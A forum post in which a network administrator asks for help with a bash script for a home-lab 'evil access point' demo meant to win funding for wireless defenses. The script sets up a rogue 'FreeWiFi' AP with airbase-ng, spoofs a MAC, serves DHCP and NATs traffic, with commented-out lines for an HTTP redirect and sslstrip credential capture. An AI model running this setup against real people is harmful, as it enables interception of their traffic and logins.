I've demoed some of the tools on Kali with my management in order to get funding for new pieces of hardware and software to combat "rogue elements" on the corporate network. Right now I'm working on a proposal to fund the purchase of Motorola AirDefense and as part of this I'm trying to set up a simple "evil access point". I'm working in my home lab ATM and am having issues with the script for this.
(I prefer to use shell scripts over GUI tools because the management seems to respond better to seeing text fly by instead of GUI tools... go figure).
A while back I tried doing this under Backtrack, but couldn't get it working quite right. I dug up the old script I was working with, which IIRC was either one I downloaded or something hacked together from different scripts, but either way I never got it working right.
Trying this on Kali 2 and I've made some changes from the original script
I can't pinpoint where this is going wrong. I can connect to the AP, but I'm not receiving an IP address via dhcp. I want to be able to connect to the AP and have internet access through it for any client connected to it to simulate a person standing up an malicious AP where the victim is completely unaware that they're at risk of being compromised. It also serves to strengthen my argument against our guest network being wide open so I can clamp down on unfettered access to it.Code:#!/bin/bash #____[start of config]_________________________ # these two values can be overwritten using # arguments to the command essid="FreeWiFi" channel="4" subnet="192.168.100.0" startip="192.168.100.100" endip="192.168.100.200" broadcast="192.168.100.255" router="192.168.100.1" netmask="255.255.255.0" dns="8.8.8.8" #____[end of config]___________________________ # override the default essid if one is provided if [[ ! -z ${1} ]]; then essid="${1}" fi # override the default channel if one is provided if [[ ! -z ${2} ]]; then channel="${2}" fi function clear_iptables { iptables --flush iptables --table nat --flush iptables --table nat --delete-chain iptables --delete-chain } function cleanup { echo "* cleaning up" killall sslstrip killall dhcpd rm -rf /tmp/dhcpd rm -f /tmp/dhcpd.conf ifconfig at0 down killall airbase-ng clear_iptables echo "* end of script" exit 0 } trap cleanup INT echo "* creating dummy dhcpd.conf" cat << EOF > /tmp/dhcpd.conf ddns-update-style standard; default-lease-time 600; max-lease-time 7200; subnet ${subnet} netmask ${netmask} { option subnet-mask ${netmask}; option broadcast-address ${broadcast}; option routers ${router}; option domain-name-servers ${dns}; range ${startip} ${endip}; } EOF echo "* starting airbase-ng essid ${essid} on channel ${channel}" airbase-ng -e "${essid}" -q -c ${channel} wlan0mon & sleep 3 echo "* spoofing MAC address for at0" ifconfig at0 down macchanger -m 00:17:3F:03:13:37 at0 echo "* bringing up at0 and setting route" ifconfig at0 up ifconfig at0 ${router} netmask ${netmask} route add -net ${subnet} netmask ${netmask} gw ${router} echo "* starting dhcpd" mkdir -p /tmp/dhcpd touch /tmp/dhcpd/dhcpd.leases chown -R dhcpd:dhcpd /tmp/dhcpd dhcpd -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/dhcpd.pid -lf /tmp/dhcpd/dhcpd.leases at0 echo "* setting up forwarding rules" clear_iptables iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT # mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2) # echo "* using ${mygw} as gateway" # iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw} # # iptables -t nat -D PREROUTING 1 # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 echo 1 > /proc/sys/net/ipv4/ip_forward # uncomment these two lines to turn on sslstrip # echo "* starting sslstrip and logging results to log.txt" # sslstrip -f -k -w log.txt & echo "* setup complete, now we wait for connections" echo "* enter CTRL-C to quit and cleanup" while :; do sleep 60 done;
